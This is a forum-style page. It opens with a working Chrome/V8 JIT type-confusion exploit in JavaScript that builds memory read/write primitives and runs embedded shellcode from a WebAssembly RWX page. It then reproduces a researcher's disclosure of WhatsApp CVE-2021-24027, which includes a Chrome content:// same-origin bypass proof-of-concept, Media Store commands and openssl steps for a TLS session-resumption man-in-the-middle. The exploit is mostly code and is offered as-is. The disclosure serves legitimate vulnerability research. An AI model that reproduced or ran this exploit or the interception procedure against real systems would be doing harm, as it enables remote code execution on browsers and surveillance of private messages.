var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod);
var f = wasm_instance.exports.main;

var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);
let buf2 = new ArrayBuffer(0x150);

function ftoi(val) {
    f64_buf[0] = val;
    return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
}

function itof(val) {
    u64_buf[0] = Number(val & 0xffffffffn);
    u64_buf[1] = Number(val >> 32n);
    return f64_buf[0];
}

const _arr = new Uint32Array([2**31]);

function foo(a) {
    var x = 1;
    x = (_arr[0] ^ 0) + 1;
    x = Math.abs(x);
    x -= 2147483647;
    x = Math.max(x, 0);
    x -= 1;
    if(x==-1) x = 0;
    var arr = new Array(x);
    arr.shift();
    var cor = [1.1, 1.2, 1.3];
    return [arr, cor];
}

for(var i=0;i<0x3000;++i) foo(true);

var x = foo(false);
var arr = x[0];
var cor = x[1];
const idx = 6;
arr[idx+10] = 0x4242;

function addrof(k) {
    arr[idx+1] = k;
    return ftoi(cor[0]) & 0xffffffffn;
}

function fakeobj(k) {
    cor[0] = itof(k);
    return arr[idx+1];
}

var float_array_map = ftoi(cor[3]);
var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
var fake = fakeobj(addrof(arr2) + 0x20n);

function arbread(addr) {
    if (addr % 2n == 0) {
        addr += 1n;
    }
    arr2[1] = itof((2n << 32n) + addr - 8n);
    return (fake[0]);
}

function arbwrite(addr, val) {
    if (addr % 2n == 0) {
        addr += 1n;
    }
    arr2[1] = itof((2n << 32n) + addr - 8n);
    fake[0] = itof(BigInt(val));
}

function copy_shellcode(addr, shellcode) {
    let dataview = new DataView(buf2);
    let buf_addr = addrof(buf2);
    let backing_store_addr = buf_addr + 0x14n;
    arbwrite(backing_store_addr, addr);
    for (let i = 0; i < shellcode.length; i++) {
        dataview.setUint32(4*i, shellcode[i], true);
    }
}

var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n));
console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16));

var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957];

copy_shellcode(rwx_page_addr, shellcode);
f();

Sursa: https://github.com/r4j0x00/exploits/tree/master/chrome-0day
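The exploit's ftoi/itof helpers type-pun between IEEE-754 doubles and 64-bit integers through a shared ArrayBuffer, which is how leaked pointers travel through float arrays. The same primitive can be sketched in Python with the standard struct module (an illustration of the trick, not part of the exploit):

```python
import struct

def ftoi(val: float) -> int:
    """Return the 64 raw bits of an IEEE-754 double as an unsigned int."""
    return struct.unpack("<Q", struct.pack("<d", val))[0]

def itof(val: int) -> float:
    """Return the double whose raw bit pattern is the given 64-bit int."""
    return struct.unpack("<d", struct.pack("<Q", val))[0]

# The round trip is lossless, so an address stored as a float is recoverable.
assert itof(ftoi(1.5)) == 1.5
print(hex(ftoi(1.5)))  # 0x3ff8000000000000
```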
  18. Remote exploitation of a man-in-the-disk vulnerability in WhatsApp (CVE-2021-24027) CENSUS has been investigating for some time now the exploitation potential of Man-in-the-Disk (MitD) [01] vulnerabilities in Android. Recently, CENSUS identified two such vulnerabilities in the popular WhatsApp messenger app for Android [34]. The first of these was possibly independently reported to Facebook and was found to be patched in recent versions, while the second one was communicated by CENSUS to Facebook and was tracked as CVE-2021-24027 [33]. As both vulnerabilities have now been patched, we would like to share our discoveries regarding the exploitation potential of such vulnerabilities with the rest of the community. In this article we will have a look at how a simple phishing attack through an Android messaging application could result in the direct leakage of data found in External Storage (/sdcard). Then we will show how the two aforementioned WhatsApp vulnerabilities would have made it possible for attackers to remotely collect TLS cryptographic material for TLS 1.3 and TLS 1.2 sessions. With the TLS secrets at hand, we will demonstrate how a man-in-the-middle (MitM) attack can lead to the compromise of WhatsApp communications, to remote code execution on the victim device and to the extraction of Noise [05] protocol keys used for end-to-end encryption in user communications. Android 10 introduced the scoped storage feature [13], as a proactive defense against these types of attacks. With scoped storage, apps get by default access only to their own content on External Storage. Apps bearing a certain permission [36] can also access content shared by other applications. Finally, full access to External Storage is only granted to special purpose apps (e.g. file managers) that have been audited by Google. 
Android 11 is the first version to fully enforce the scoped storage rules on all apps, while Android 10 included a permissive mode of operation to provide developers with the needed time to transition to the new file access scheme. The techniques presented in this article apply to mobile devices running Android versions up to and including Android 9. It is possible to perform similar attacks using file-based access in Android 10, but we have not included these for reasons of brevity. Even without Android 10 in the picture, the number of affected devices remains quite large. Appbrain statistics [35] hint that devices running Android up to and including version 9 may very well constitute 60% of all devices running Android today.

In the past, state sponsored actors have used messaging applications to infiltrate activist groups [06] or even to attack individuals [07], and so seemingly innocent interactions in such applications may indeed be part of targeted phishing attacks. More importantly, vulnerabilities that enable adversaries to perform man-in-the-middle attacks can be abused for mass surveillance purposes. CENSUS has no knowledge on whether the attacks described in this article have indeed been used in the wild.

WhatsApp users are strongly recommended to upgrade to version 2.21.4.18 or later. Keeping system components updated, such as the Chrome browser and the Android Operating System, is also key to establishing a proactive defense against man-in-the-disk vulnerabilities.

Note: All WhatsApp code snippets presented in this text correspond to decompiled Java code recovered from an older version of WhatsApp (2.19.355) using jadx [08]. Most classes and variables have been renamed to reflect their semantics. Original minified class names are also provided where possible.
Here are some quick links to help you navigate through this blog post:

- The Android Media Store Content Provider
- The Chrome CVE-2020-6516 Same-Origin-Policy bypass
- Session Resumption and Pre-Shared Keys in TLS 1.3
- Session Resumption and the Master Secret in TLS 1.2
- The WhatsApp TLS Man-in-the-disk Vulnerabilities
- From TLS secrets collection to Remote Code Execution
- Stealing the victim's Noise protocol key pair
- Conclusion and Future Work

The Android Media Store Content Provider

When a user clicks on a picture message, WhatsApp needs to call an external application to view the file. However, the external application might not have access to WhatsApp's internal storage. Indeed, one cannot make any assumptions on the whereabouts of this picture file on the filesystem or its permissions. So, in the picture case, there must be a way for the photo viewer to locate, read and display media files belonging to WhatsApp. Enter the concept of Content Providers [09], an IPC mechanism by which one application (e.g. WhatsApp) can share resources with any other application (e.g. Google Photos).

Content providers are an interesting technology and a powerful tool in the hands of Android developers. There are plenty of content providers on an Android system; some exported by third-party applications, others exported by the Android framework itself. For example, a modern Android device comes with content providers that expose SMS and MMS information, telephony logs, browser bookmarks, downloaded files and so on. Of course, content providers also come with a means of controlling access to their resources (e.g. see exported, permission and grantUriPermissions [10]). Despite the various pitfalls and past CVE-less issues [11], these security controls generally work well.

However, there are certain content providers which can be freely accessed by any application by design. The Media Store is one such example. It exports a content provider which indexes and manages all files under /sdcard.
Using the Media Store, applications can read and write files in external storage, without relying on absolute filesystem paths. The Android developer documentation emphasizes that the content provider of Media Store is the preferred way of accessing external storage files in application code.

To experiment with content providers, one can use the content command on Android devices. Root access is not necessarily required. For example, to see the list of files managed by the Media Store, one can execute the following command:

$ content query --uri content://media/external/file

To make the output more human friendly, one can limit the displayed columns to the identifier and path of each indexed file.

$ content query --uri content://media/external/file --projection _id,_data

Media providers exist in their own private namespace. As illustrated in the example above, to access a content provider the corresponding content:// URI should be specified. Generally, information on the paths, via which a provider can be accessed, can be recovered by looking at application manifests (in case the content provider is exported by an application) or the source code of the Android framework.

Interestingly, on Android devices Chrome supports accessing content providers via the content:// scheme. This feature allows the browser to access resources (e.g. photos, documents etc.) exported by third party applications. To verify this, one can insert a custom entry in the Media Store and then access it using the browser:

$ cd /sdcard
$ echo "Hello, world!"
> test.txt
$ content insert --uri content://media/external/file \
    --bind _data:s:/storage/emulated/0/test.txt \
    --bind mime_type:s:text/plain

To discover the identifier of the newly inserted file:

$ content query --uri content://media/external/file \
    --projection _id,_data | grep test.txt
Row: 283 _id=747, _data=/storage/emulated/0/test.txt

And to actually view the file in Chrome, one can use a URL like the one shown in the following picture. Notice the file identifier 747 (discovered above) which is used as a suffix in the URL.

As this article focuses on WhatsApp, it would be interesting to see the list of related files indexed by the Media Store. The following output was collected from a Pixel 3a device after using WhatsApp for a few days.

$ content query --uri content://media/external/file --projection _id,_data | grep -i whatsapp
...
Row: 82 _id=58, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/SSLSessionCache
Row: 83 _id=705, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/SSLSessionCache/157.240.9.53.443
Row: 84 _id=239, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/SSLSessionCache/crashlogs.whatsapp.net.443
Row: 85 _id=240, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/SSLSessionCache/pps.whatsapp.net.443
Row: 86 _id=90, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/SSLSessionCache/static.whatsapp.net.443
Row: 87 _id=706, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/SSLSessionCache/v.whatsapp.net.443
Row: 88 _id=89, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/SSLSessionCache/www.whatsapp.com.443
...
Row: 90 _id=57, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/watls-sessions
Row: 91 _id=704, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/watls-sessions/bW1nLndoYXRzYXBwLm5ldCM0NDMjVExTX0FFU18xMjhfR0NNX1NIQTI1Ng==
Row: 92 _id=743, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/watls-sessions/bWVkaWEtYW10Mi0xLmNkbi53aGF0c2FwcC5uZXQjNDQzI1RMU19BRVNfMTI4X0dDTV9TSEEyNTY=
Row: 93 _id=744, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/watls-sessions/bWVkaWEuZmF0aDQtMi5mbmEud2hhdHNhcHAubmV0IzQ0MyNUTFNfQUVTXzEyOF9HQ01fU0hBMjU2
...
Row: 291 _id=206, _data=/storage/emulated/0/WhatsApp/Backups
Row: 292 _id=252, _data=/storage/emulated/0/WhatsApp/Backups/chatsettingsbackup.db.crypt1
Row: 293 _id=253, _data=/storage/emulated/0/WhatsApp/Backups/statusranking.db.crypt1
Row: 294 _id=251, _data=/storage/emulated/0/WhatsApp/Backups/stickers.db.crypt1
Row: 295 _id=204, _data=/storage/emulated/0/WhatsApp/Databases
Row: 296 _id=708, _data=/storage/emulated/0/WhatsApp/Databases/msgstore-2020-10-07.1.db.crypt12
Row: 297 _id=709, _data=/storage/emulated/0/WhatsApp/Databases/msgstore-2020-10-08.1.db.crypt12
Row: 298 _id=746, _data=/storage/emulated/0/WhatsApp/Databases/msgstore-2020-10-09.1.db.crypt12
Row: 299 _id=243, _data=/storage/emulated/0/WhatsApp/Databases/msgstore.db.crypt12
...
Row: 319 _id=528, _data=/storage/emulated/0/WhatsApp/Media/WhatsApp Images
Row: 320 _id=721, _data=/storage/emulated/0/WhatsApp/Media/WhatsApp Images/IMG-20201009-WA0013.jpeg
Row: 321 _id=722, _data=/storage/emulated/0/WhatsApp/Media/WhatsApp Images/IMG-20201009-WA0015.jpeg
Row: 322 _id=724, _data=/storage/emulated/0/WhatsApp/Media/WhatsApp Images/IMG-20201009-WA0018.jpeg
Row: 323 _id=733, _data=/storage/emulated/0/WhatsApp/Media/WhatsApp Images/IMG-20201009-WA0029.jpeg
Row: 324 _id=734, _data=/storage/emulated/0/WhatsApp/Media/WhatsApp Images/IMG-20201009-WA0032.jpeg
Row: 325 _id=735, _data=/storage/emulated/0/WhatsApp/Media/WhatsApp Images/IMG-20201009-WA0035.jpeg
...

Apart from the last few lines, where paths to various image files are shown, there are plenty of interesting entries in the above listing: backups, databases, and the more suspicious-looking SSLSessionCache and watls-sessions. For the uninitiated, /storage/emulated/0 is a synonym for /sdcard, i.e. the external storage path. Apps bearing the READ_EXTERNAL_STORAGE permission may obtain access to any file stored in external storage in Android 9 and previous Android versions. It is also essential to note that file identifiers like 323, 324 and 325 shown above are just sequential integers which can be guessed or even bruteforced. On a typical Android device, these identifiers usually fall within the range of tens of thousands.

The Chrome CVE-2020-6516 Same-Origin-Policy bypass

The Same Origin Policy (SOP) [12] in browsers dictates that Javascript content of URL A will only be able to access content at URL B if the following URL attributes remain the same for A and B:

- The protocol, e.g. https vs. http
- The domain, e.g. www.example1.com vs. www.example2.com
- The port, e.g. www.example1.com:8080 vs. www.example1.com:8443

Of course, there are exceptions to the above rules, but in general, a resource from https://www.example1.com (e.g.
a piece of Javascript code) cannot access the DOM of a resource on https://www.example2.com, as this would introduce serious information leaks. Unless a Cross-Origin-Resource-Sharing (CORS) policy explicitly allows so, it shouldn't be possible for a web resource to bypass the SOP rules.

It's essential to note that Chrome considers content:// to be a local scheme, just like file://. In this case SOP rules are even more strict, as each local scheme URL is considered a separate origin. For example, Javascript code in file:///tmp/test.html should not be able to access the contents of file:///tmp/test2.html, or any other file on the filesystem for that matter. Consequently, according to SOP rules, a resource loaded via content:// should not be able to access any other content:// resource. Well, vulnerability CVE-2020-6516 of Chrome created an "exception" to this rule.

CVE-2020-6516 [03] is a SOP bypass on resources loaded via a content:// URL. For example, Javascript code, running from within the context of an HTML document loaded from content://com.example.provider/test.html, can load and access any other resource loaded via a content:// URL. This is a serious vulnerability, especially on devices running Android 9 or previous versions of Android. On these devices scoped storage [13] is not implemented and, consequently, application-specific data under /sdcard, and more interestingly under /sdcard/Android, can be accessed via the system's Media Store content provider.

A proof-of-concept is pretty straightforward. An HTML document that uses XMLHttpRequest to access arbitrary content:// URLs is uploaded under /sdcard. It is then added in the Media Store and rendered in Chrome, in a fashion similar to the example shown earlier. For demonstration purposes, one can attempt to load content://media/external/file/747 which is, in fact, the Media Store URL of the "Hello, world!" example.
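The origin comparison rules above can be sketched in a few lines of Python. This is an illustrative toy model (same_origin is a made-up helper, not a browser API), with local schemes such as file:// and content:// treated as opaque origins that never compare equal:

```python
from urllib.parse import urlsplit

# Schemes treated as "local": each such URL is its own opaque origin.
LOCAL_SCHEMES = {"file", "content"}

def same_origin(url_a: str, url_b: str) -> bool:
    """Toy model of the (scheme, host, port) origin check."""
    a, b = urlsplit(url_a), urlsplit(url_b)
    if a.scheme in LOCAL_SCHEMES or b.scheme in LOCAL_SCHEMES:
        # Opaque origins never match, so one content:// document
        # must not be able to read another content:// resource.
        return False
    return (a.scheme, a.hostname, a.port) == (b.scheme, b.hostname, b.port)

print(same_origin("https://www.example1.com/a", "https://www.example1.com/b"))        # True
print(same_origin("https://www.example1.com", "http://www.example1.com"))             # False
print(same_origin("https://www.example1.com:8080", "https://www.example1.com:8443"))  # False
print(same_origin("content://media/external/file/746",
                  "content://media/external/file/747"))                               # False
```

CVE-2020-6516 effectively made the last comparison behave as if it returned True for content:// documents.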
Surprisingly, the Javascript code, running within the origin of the HTML document, will fetch and display the contents of test.txt.

<html>
<head>
<title>PoC</title>
<script type="text/javascript">
function poc() {
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = function() {
        if(this.readyState == 4) {
            if(this.status == 200 || this.status == 0) {
                alert(xhr.response);
            }
        }
    }
    xhr.open("GET", "content://media/external/file/747");
    xhr.send();
}
</script>
</head>
<body onload="poc()"></body>
</html>

To see this in action, upload the HTML document, shown above, on the device under /sdcard/test.html. Then insert it in the Media Store's database:

$ content insert --uri content://media/external/file \
    --bind _data:s:/storage/emulated/0/test.html \
    --bind mime_type:s:text/html

To read the identifier of the newly inserted file, execute the following command. In this example, test.html's _id is 617.

$ content query --uri content://media/external/file \
    --projection _id,_data | grep test.html
Row: 312 _id=617, _data=/storage/emulated/0/test.html

To execute the proof-of-concept code, open content://media/external/file/617 in Chrome. You should see something like the following:

One may ask, "but how is WhatsApp related to this Chrome vulnerability?". If an attacker sends a malicious HTML file to a victim user over WhatsApp, then when this file is viewed it will actually be rendered using Chrome. Chrome will use a content provider internal to WhatsApp to access the malicious Javascript content. However, due to the CVE-2020-6516 Chrome bug the malicious code will be able to access any other resource from any other content provider on the system.

The astute reader might remember that we had found that WhatsApp placed the SSLSessionCache and watls-sessions directories under unprotected external storage. These directories contain TLS session cryptographic material.
This material could have been collected in the way we just explained, by a remote attacker through a phishing attack. In the sections that follow we will explain how session resumption works for TLS 1.3 and TLS 1.2, but also how the collected cryptographic material could be used to conduct man-in-the-middle attacks against victim users.

Session Resumption and Pre-Shared Keys in TLS 1.3

TLS connections go through a process referred to as the TLS handshake. During this process, communicating peers will authenticate each other, negotiate cryptographic parameters and determine various aspects of the connection via a set of agreed-upon extensions. Server identity authentication uses asymmetric cryptography (for X509 certificate validation etc.), which is a computationally intensive process, especially for smaller form-factor embedded devices (e.g. mobile phones). For TLS 1.3, the handshake protocol is analyzed in section 4 of RFC 8446 [17].

To reduce power consumption and save CPU cycles when multiple or simultaneous TLS connections are established in a short period of time, session resumption was proposed. In TLS 1.3, session resumption is based on Pre-Shared Keys (PSKs). PSKs are typically established in-band after a successful certificate-based authentication (but it is also possible to establish these out-of-band through, for example, secrets on a piece of paper). During session resumption, knowledge of the PSK acts as the sole authentication mechanism between the client and the server. No other (certificate-based etc.) authentication will be required by the communicating peers. Avoiding the asymmetric cryptography of certificate-based authentication makes session resumption faster and greener in terms of power consumption.
The above leads to an interesting conclusion: if a remote attacker could collect the PSK from the client device, then it would be possible to perform a man-in-the-middle attack against this client during TLS session resumption, as no certificate validation would be performed against the fraudulent server endpoint.

In Android, certificate validation is performed by the framework, but application developers are allowed to override this process for the purpose of implementing their own custom certificate handling/pinning mechanism. Certificate pinning enables apps to only proceed to a connection if the presented certificate has certain characteristics (e.g. has a certain public key, is signed by a certain intermediate certificate etc.). The class responsible for handling server-presented certificates is X509TrustManager and developers are free to inherit and override its checkServerTrusted() method. However, as no certificate validation is performed in TLS session resumption, the X509TrustManager is never consulted, and thus no standard or custom certificate validation (e.g. pinning checks) will take place. This becomes the perfect opportunity for a man-in-the-middle attack.

Page 8 of RFC 8446, the TLS 1.3 specification, notes that:

"Session resumption with and without server-side state as well as the PSK-based cipher suites of earlier TLS versions have been replaced by a single new PSK exchange."

This means that all PSK related actions have been homogenized (both PSK cipher suites and PSKs for session resumption) in TLS 1.3. This makes it easy for us to create the man-in-the-middle endpoint for session resumption through standard tools such as the openssl s_server implementation. The attacker-controlled s_server instance does not need to do a lookup for the right PSK to use in the incoming connection, as this can be fixed to the collected one (through the -psk parameter).
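To make the role of the PSK more concrete, the TLS 1.3 key schedule that turns a resumption PSK into a binder key can be reproduced with nothing but the standard library. The following Python sketch implements HKDF-Expand-Label / Derive-Secret from RFC 8446 (Section 7.1) with SHA-256 and applies it to a sample Resumption PSK value; it illustrates the key schedule only and is not part of the CENSUS PoC:

```python
import hashlib
import hmac
import struct

def hkdf_expand(prk: bytes, info: bytes, length: int) -> bytes:
    """RFC 5869 HKDF-Expand with HMAC-SHA256."""
    out, block, counter = b"", b"", 1
    while len(out) < length:
        block = hmac.new(prk, block + info + bytes([counter]), "sha256").digest()
        out += block
        counter += 1
    return out[:length]

def hkdf_expand_label(secret: bytes, label: str, context: bytes, length: int) -> bytes:
    """RFC 8446 HkdfLabel: uint16 length || 'tls13 ' + label || context."""
    full_label = b"tls13 " + label.encode()
    info = (struct.pack(">H", length)
            + bytes([len(full_label)]) + full_label
            + bytes([len(context)]) + context)
    return hkdf_expand(secret, info, length)

# A resumption PSK as it would be extracted with `openssl sess_id -text`.
psk = bytes.fromhex(
    "C4B33F312F10EBB2B7EE125EB8C686DF83E85D740F49B5CE6EB09499065B3353")

# Early Secret = HKDF-Extract(salt = 0, IKM = PSK)
early_secret = hmac.new(b"\x00" * 32, psk, "sha256").digest()

# binder_key = Derive-Secret(Early Secret, "res binder", "")
binder_key = hkdf_expand_label(
    early_secret, "res binder", hashlib.sha256(b"").digest(), 32)
print(binder_key.hex())
```

Everything in this chain is derived deterministically from the PSK, which is exactly why leaking the PSK from /sdcard hands the attacker all the material needed to impersonate the server during resumption.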
Furthermore, TLS 1.3 uses a PSK binder value to have the client prove to the server that it is indeed the true owner of a previously established PSK. The attacker-controlled endpoint is free to ignore this value, and will proceed to establishing the connection as implemented in our patch for OpenSSL, found in the PoC repository [37] under openssl-1.1.1f-patches/watls-mitm.patch.

To demonstrate the above, let's use the OpenSSL client to connect to one of WhatsApp's servers that uses TLS v1.3. Session information can be stored, for resumption at a later time, using the -sess_out command line switch, as shown below:

$ openssl s_client -host media-sof1-1.cdn.whatsapp.net -port 443 -sess_out /tmp/session.pem

Let's have a look at the corresponding PSK:

$ openssl sess_id -in /tmp/session.pem -text | grep PSK
    Resumption PSK: C4B33F312F10EBB2B7EE125EB8C686DF83E85D740F49B5CE6EB09499065B3353
    PSK identity: None
    PSK identity hint: None

Next, follow the instructions in our PoC's watls_psk_extract/README.md to prepare a modified OpenSSL variant, capable of performing TLS v1.3 MitM, and execute run_server.sh, passing it the extracted PSK, as shown below:

$ cd watls_psk_extract
$ ./run_server.sh C4B33F312F10EBB2B7EE125EB8C686DF83E85D740F49B5CE6EB09499065B3353
Using PSK C4B33F312F10EBB2B7EE125EB8C686DF83E85D740F49B5CE6EB09499065B3353
Running WaTLS version
ACCEPT

If our theory is correct, one can now use /tmp/session.pem to connect to localhost and resume the session that was initially established with media-sof1-1.cdn.whatsapp.net.
Indeed, using OpenSSL's s_client and the -sess_in command line switch, we can do the following: $ openssl s_client -sess_in /tmp/session.pem -host localhost -port 443 CONNECTED(00000006) Can't use SSL_get_servername --- Server certificate -----BEGIN CERTIFICATE----- MIIF1zCCBL+gAwIBAgIQDOmsxODES4Klhbv8cv6EizANBgkqhkiG9w0BAQsFADBw MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3 d3cuZGlnaWNlcnQuY29tMS8wLQYDVQQDEyZEaWdpQ2VydCBTSEEyIEhpZ2ggQXNz dXJhbmNlIFNlcnZlciBDQTAeFw0yMTAyMTAwMDAwMDBaFw0yMTA1MTAyMzU5NTla MGkxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpDYWxpZm9ybmlhMRMwEQYDVQQHEwpN ZW5sbyBQYXJrMRcwFQYDVQQKEw5GYWNlYm9vaywgSW5jLjEXMBUGA1UEAwwOKi53 aGF0c2FwcC5uZXQwWTATBgcqhkjOPQIBBggqhkjOPQMBBwNCAARnhHhwhX0sqHwl bcIQUCcf6974FldeoPmrHOOEDPGSxeRVRxOXRaGjfX72Xlakyz5WpJx8uSlghjjz qvaTeBNwo4IDPTCCAzkwHwYDVR0jBBgwFoAUUWj/kK8CB3U8zNllZGKiErhZcjsw HQYDVR0OBBYEFDGwR2i4anDM4OmK42mRNINbzAxdMHQGA1UdEQRtMGuCEiouY2Ru LndoYXRzYXBwLm5ldIISKi5zbnIud2hhdHNhcHAubmV0gg4qLndoYXRzYXBwLmNv bYIOKi53aGF0c2FwcC5uZXSCBXdhLm1lggx3aGF0c2FwcC5jb22CDHdoYXRzYXBw Lm5ldDAOBgNVHQ8BAf8EBAMCB4AwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUF BwMCMHUGA1UdHwRuMGwwNKAyoDCGLmh0dHA6Ly9jcmwzLmRpZ2ljZXJ0LmNvbS9z aGEyLWhhLXNlcnZlci1nNi5jcmwwNKAyoDCGLmh0dHA6Ly9jcmw0LmRpZ2ljZXJ0 LmNvbS9zaGEyLWhhLXNlcnZlci1nNi5jcmwwPgYDVR0gBDcwNTAzBgZngQwBAgIw KTAnBggrBgEFBQcCARYbaHR0cDovL3d3dy5kaWdpY2VydC5jb20vQ1BTMIGDBggr BgEFBQcBAQR3MHUwJAYIKwYBBQUHMAGGGGh0dHA6Ly9vY3NwLmRpZ2ljZXJ0LmNv bTBNBggrBgEFBQcwAoZBaHR0cDovL2NhY2VydHMuZGlnaWNlcnQuY29tL0RpZ2lD ZXJ0U0hBMkhpZ2hBc3N1cmFuY2VTZXJ2ZXJDQS5jcnQwDAYDVR0TAQH/BAIwADCC AQUGCisGAQQB1nkCBAIEgfYEgfMA8QB2AH0+8viP/4hVaCTCwMqeUol5K8UOeAl/ LmqXaJl+IvDXAAABd4q64v0AAAQDAEcwRQIgKZOZs5XzLPIAR1XcJzkjS721qtTO 7HnHtN9lQ6gmLjUCIQCiJCYvSURNjEWk+OKy9DJQ8J19BeZTXPqQtEq3HrcTLwB3 AFzcQ5L+5qtFRLFemtRW5hA3+9X6R9yhc5SyXub2xw7KAAABd4q64skAAAQDAEgw RgIhAKzh5Q+vXt+C9HS7r+H1ZjJIQeK11tLGnBNGVFAExeSLAiEAsAW8HhwfFSBE sHaeIUyKt1xq03qjfjLmy6FQnE3lDj8wDQYJKoZIhvcNAQELBQADggEBAF+XRlKE 
eval5PuqA1hKHJRtvP5uQUneXLAS+ch1pjhfveKjUuiWm+04y+liSlVRoGNm/6Og GEg9CrCMu2SlFsD6UMsK6BMmb3HWcFH5P9HY1so1cIsXcpSxwJEDbZD8ATDA1rH3 komGIYbzgMbcfMi/mjyXTvxrdaBp5QnT32PzOxMyYuWn2gg3n7wxBKppyGuuqarP tIXuIsBkLe+6k1S0+gvuRS4l28V/BD985eQZJg8/KE6061v/aLNBlP3anIksH9AJ 9j1zerIq9cL7NEcvz1PEu97D1SpBH75znPAHArtjXa/0U7SRwQxahx8a82pl/+Zb rGufx1+jMcviB6M= -----END CERTIFICATE----- subject=C = US, ST = California, L = Menlo Park, O = "Facebook, Inc.", CN = *.whatsapp.net issuer=C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert SHA2 High Assurance Server CA --- No client certificate CA names sent Server Temp Key: X25519, 253 bits --- SSL handshake has read 225 bytes and written 534 bytes Verification: OK --- Reused, TLSv1.3, Cipher is TLS_AES_128_GCM_SHA256 Server public key is 256 bit Secure Renegotiation IS NOT supported Compression: NONE Expansion: NONE No ALPN negotiated Early data was not sent Verify return code: 0 (ok) --- --- Post-Handshake New Session Ticket arrived: SSL-Session: Protocol : TLSv1.3 Cipher : TLS_AES_128_GCM_SHA256 Session-ID: D600D456331645CDF46A5426F3CE7801CE228B98195D7E511D8A5F4F783F225F Session-ID-ctx: Resumption PSK: ACEE401AC866A076351CD495517260327104CF08BD1CBFB75299ADB658991B2C PSK identity: None PSK identity hint: None SRP username: None TLS session ticket lifetime hint: 304 (seconds) TLS session ticket: 0000 - ff 64 91 18 ea 0a 17 1c-2f 10 20 52 ef 08 7a 8a .d....../. R..z. 0010 - 94 91 f4 ff 47 f0 28 d4-78 e5 65 a0 6d f0 c0 fe ....G.(.x.e.m... Start Time: 1615551534 Timeout : 7200 (sec) Verify return code: 0 (ok) Extended master secret: no Max Early Data: 0 --- read R BLOCK read:errno=0 There are a few things worth noting in the above output. First and foremost, the certificate displayed does not come from the TLS handshake, but was deserialized directly from /tmp/session.pem, as the latter was used for session resumption purposes. 
Next, looking carefully, one can see a message reading Verification: OK, despite the fact that our MitM server uses a self-signed certificate. Furthermore, a few lines below, we are informed that the session was reused (Reused, TLSv1.3, Cipher is TLS_AES_128_GCM_SHA256) and that verification was indeed successful (Verify return code: 0 (ok)). From the client's perspective, everything seems normal and the connection is resumed.

The modified s_server accepts the connection, but receives a PSK binder which is HMAC'ed with an unknown key. However, the binder is ignored, and since the exact PSK value was specified at the command line, connection establishment can proceed as usual. When that happens, the following output is printed at the server's console:

$ ./run_server.sh C4B33F312F10EBB2B7EE125EB8C686DF83E85D740F49B5CE6EB09499065B3353
...
PSK warning: client identity not what we expected (got '...' expected 'Client_identity')
Ignoring PSK binders!

Another thing to note here is that, clearly, the PSK identity is not important for the server. It is just a lookup key in a cache, a hash table of PSKs for example, and does not constitute a cryptographic proof of any kind. The server accepts the connection despite the fact that a different PSK identity was expected.

Session Resumption and the Master Secret in TLS 1.2

In TLS 1.2, session resumption is based solely on Master Secret knowledge; if the two communicating parties have saved their previous state in a secure location, they can continue communicating by re-deriving new session keys based on the previously agreed upon shared secret. As with TLS 1.3, session resumption does not go through any other form of authentication (e.g. certificate validation). The handshake protocol of TLS 1.2 is analyzed in section 7 of RFC 5246 [21], while session resumption in section F.1.4:

"When a connection is established by resuming a session, new ClientHello.random and ServerHello.random values are hashed with the session's master_secret.
Provided that the master_secret has not been compromised and that the secure hash operations used to produce the encryption keys and MAC keys are secure, the connection should be secure and effectively independent from previous connections. Attackers cannot use known encryption keys or MAC secrets to compromise the master_secret without breaking the secure hash operations."

"The client sends a ClientHello using the Session ID of the session to be resumed. The server then checks its session cache for a match. If a match is found, and the server is willing to re-establish the connection under the specified session state, it will send a ServerHello with the same Session ID value."

Again, the session ID serves no cryptographic purpose other than probably playing the role of an index in the server's session cache. Moreover, it should be noted that the use of extended master secrets [22] does not protect from stolen master keys.

To see how this works in practice, one can do the following. First, connect to one of WhatsApp's servers using TLS v1.2 and store the session on disk using -sess_out as shown below:

$ openssl s_client -tls1_2 -host crashlogs.whatsapp.net -port 443 -sess_out /tmp/session.pem

Carefully examine the output of the above command. There should be no verification errors or anything of the sort, as WhatsApp's infrastructure uses certificates issued by DigiCert. The session identifier and the master secret of the saved session can be examined using the following command:

